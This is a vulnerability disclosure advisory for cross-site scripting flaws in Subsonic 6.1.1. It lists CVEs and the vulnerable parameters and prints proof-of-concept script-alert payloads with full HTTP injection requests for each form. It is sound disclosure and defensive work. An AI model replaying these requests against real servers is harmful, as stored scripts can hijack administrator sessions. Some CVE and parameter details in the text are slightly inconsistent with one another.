Subsonic 6.1.1 - Multiple Vulnerabilities

by Florian Nivette, on Sep 17, 2018 1:25:59 PM

Product Description

Subsonic is an open source web media server that enables the management of media resources such as music or videos. Its official website is www.subsonic.org. The version affected by the identified vulnerabilities is 6.1.1, released May 31, 2017.

Vulnerabilities List

Two types of cross-site scripting were identified within the Subsonic application:

  • 14 stored cross-site scripting instances
  • Five reflected cross-site scripting instances

These vulnerabilities are described in the following sections.

Affected Version

Version 6.1.1

Subsonic 6.1.1 — Vulnerabilities

Stored Cross-site Scripting

The Subsonic application is affected by 14 stored cross-site scripting (XSS) instances that are stored within different application features. These vulnerabilities enable the injection of a JavaScript payload inside a vulnerable page that will then be executed each time a user visits it. The vulnerabilities could be exploited with authenticated users and used to target administrators and steal their sessions.

Vulnerability Details

CVE ID: CVE-2018-9282, CVE-2018-14688, CVE-2018-14689, CVE-2018-14690, CVE-2018-14691

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-79

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Stored XSS on Podcast Subscription Form (CVE-2018-9282)

The podcast subscription form is affected by one stored cross-site scripting instance. No administrator access is required to exploit this instance. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is add. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

The request below can be used to exploit the instances:

POST /podcastReceiverAdmin.view? HTTP/1.1

Host: HOST

Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Stored XSS on Music Tags Settings Form (CVE-2018-14691)

The music tags setting form is affected by three stored XSS instances. No administrator access is required to exploit these instances, but tag modification permission is required. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is c0-param2, c0-param3, and c0-param4. The following payload can be used to inject code and verify the vulnerability:

“><script>alert(/XSS/)</script>

The request below could be used to exploit the instances:

POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1
Host: 192.168.1.36:4040
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

callCount=1
nextReverseAjaxIndex=0
c0-scriptName=tagService
c0-methodName=setTags
c0-id=0
c0-param0=string:65
c0-param1=string:1
c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E
c0-param3=string:%22%3E%3Cscript%3Ealert(%2FXSS2%2F)%3C%2Fscript%3E
c0-param4=string:%22%3E%3Cscript%3Ealert(%2FXSS3%2F)%3C%2Fscript%3E
c0-param5=string:
c0-param6=string:Bastard%20Pop
batchId=0
instanceId=0
page=%2FeditTags.view%3Fid%3D8
scriptSessionId=SESSIONID2

Stored XSS on Internet Radio Settings Form (CVE-2018-14688)

The internet radio settings form is affected by three stored XSS instances. Administrator access is required to exploit these instances. By injecting JavaScript payload into the form, an attacker can manipulate user sessions. The weak parameter is is name[x], streamUrl[x], homepageUrl[x] where x is an integer. The following payload can be used to inject code and verify the vulnerability:

&lt;script&gt;alert(/XSS/)&lt;/script&gt;

The request below could be used to exploit the instances:

POST /internetRadioSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradioname%2F%29%3C%2Fscript%3E&streamUrl%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradiostreamurl%2F%29%3C%2Fscript%3E&homepageUrl%5B1%5D=%22%3E%22%3Cscript%3Ealert%28%2Fradiohomepage%2F%29%3C%2Fscript%3E&enabled%5B1%5D=on&name=&streamUrl=&homepageUrl=&enabled=on

Stored XSS on General Settings Form (CVE-2018-14690)

The general settings form is affected by two stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are title and subtitle. The following payload can be used to inject code and verify the instances:

&lt;script&gt;alert(/XSS/)&lt;/script&gt;

The request below could be used to exploit the instances:

POST /generalSettings.view HTTP/1.1

Host: HOST

Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

musicFileTypes=mp3+ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&videoFileTypes=flv+avi+mpg+mpeg+mp4+m4v+mkv+mov+wmv+ogv+divx+m2ts&coverArtFileTypes=cover.jpg+cover.png+cover.gif+folder.jpg+jpg+jpeg+gif+png&playlistFolder=%2Fvar%2Fplaylists&index=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O+P+Q+R+S+T+U+V+W+X-Z%28XYZ%29&ignoredArticles=The+El+La+Los+Las+Le+Les&shortcuts=New+Incoming+Podcast&localeIndex=0&themeIndex=0&sortAlbumsByYear=true&_sortAlbumsByYear=on&_gettingStartedEnabled=on&welcomeTitle=Welcome+to+Subsonic%21%22%3E%3Cscript%3Ealert%28%2Fwelcometitle%2F%29%3C%2Fscript%3E&welcomeSubtitle=%22%3E%3Cscript%3Ealert%28%2Fwelcomesubtitle%2F%29%3C%2Fscript%3E&welcomeMessage=Welcome+to+Subsonic%21%0D%0A%5C%5C+%5C%5C%0D%0ASubsonic+is+a+free%2C+web-based+media+streamer%2C+providing+ubiquitous+access+to+your+music.+%0D%0A%5C%5C+%5C%5C%0D%0AUse+it+to+share+your+music+with+friends%2C+or+to+listen+to+your+own+music+while+at+work.+You+can+stream+to+multiple+players+simultaneously%2C+for+instance+to+one+player+in+your+kitchen+and+another+in+your+living+room.%0D%0A%5C%5C+%5C%5C%0D%0ATo+change+or+remove+this+message%2C+log+in+with+administrator+rights+and+go+to+%7Blink%3ASettings+%3E+General%7CgeneralSettings.view%7D.%0D%0A&loginMessage=

Stored XSS on Transcoding Settings Form (CVE-2018-14689)

The transcoding settings form is affected by five stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker could manipulate user sessions. The weak parameters are name[x], sourceformats[x], targetFormat[x], step1[x], and step2[x] where x is an integer. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

The request below could be used to exploit the instances:

POST /transcodingSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B0%5D=mp3+audio&sourceFormats%5B0%5D=ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&targetFormat%5B0%5D=mp3&step1%5B0%5D=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-&step2%5B0%5D=&name%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&sourceFormats%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertfrom%2F%29%3C%2Fscript%3E&targetFormat%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertto%2F%29%3C%2Fscript%3E&step1%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep1%2F%29%3C%2Fscript%3E&step2%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep2%2F%29%3C%2Fscript%3E&name=&sourceFormats=&targetFormat=&step1=&step2=&defaultActive=on&downsampleCommand=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-

Reflected Cross-site Scripting

The Subsonic application is affected by five reflected cross-site scripting (XSS) instances that require user interaction to be executed.

Vulnerability Details

CVE ID: CVE-2018-14687, CVE-2018-14689, CVE-2018-14692

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-352

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Reflected XSS Player Settings Form (CVE-2018-14687)

The personal player settings form is affected by three cross-site scripting instances. By injecting JavaScript payload into the vulnerable parameters, an attacker could use this page to manipulate the user session. Weak parameters are clone, id and technologyName. To inject code and verify the flaw the following payload could be used:

&lt;script&gt;alert(/XSS/)&lt;/script&gt;

The request below could be used to exploit the instances:

http://HOST/playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

http://HOST/playerSettings.view?id=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

POST /playerSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

playerId=3&technologyName=JUKEBOX%3cscript%3ealert(/XSS/)%3c%2fscript%3e&name=test&transcodeSchemeName=OFF&dynamicIp=true&_dynamicIp=on&autoControlEnabled=true&_autoControlEnabled=on&activeTranscodingIds=0&_activeTranscodingIds=on

Reflected XSS Stream Page (CVE-2018-14692)

The stream page is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameters, an attacker can use this page to manipulate user sessions. The weak parameter is player. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

The request below could be used to exploit the instance:

http://HOST/stream?player=%3Cscript%3Ealert(/XSS/)%3C/script%3E&amp;id=79&amp;auth=1289324648&amp;suffix=.mp3

Reflected XSS Network Settings Form (CVE-2018-14694)

The network settings form is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this form to manipulate user sessions. The weak parameter is urlRedirectingType. The following payload can be used to inject code and verify the instance:

&lt;script&gt;alert(/XSS/)&lt;/script&gt;

The request below can be used to exploit the instance:

POST /networkSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

_portForwardingEnabled=on&urlRedirectionEnabled=true&_urlRedirectionEnabled=on&urlRedirectType=CUSTOM%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&urlRedirectCustomUrl=http%3A%2F%2Ftest

Disclosure Timeline: 

  • 10/5/2017: Initial discovery
  • 4/3/2018: CVEs requested 
  • 9/14/2018: Public disclosure of vulnerabilities 

Researcher:

Florian Nivette, Security Associate at Bishop Fox 

Vulnerabilities:Stored Cross-site ScriptingReflected Cross-site Scripting

Comments

Vulnerability Disclosure Policy

Bishop Fox takes security issues very seriously. We believe in coordinated disclosure, and we work closely with vendors and clients to patch vulnerabilities promptly. More on our Disclosure Policy →

Subscribe to Updates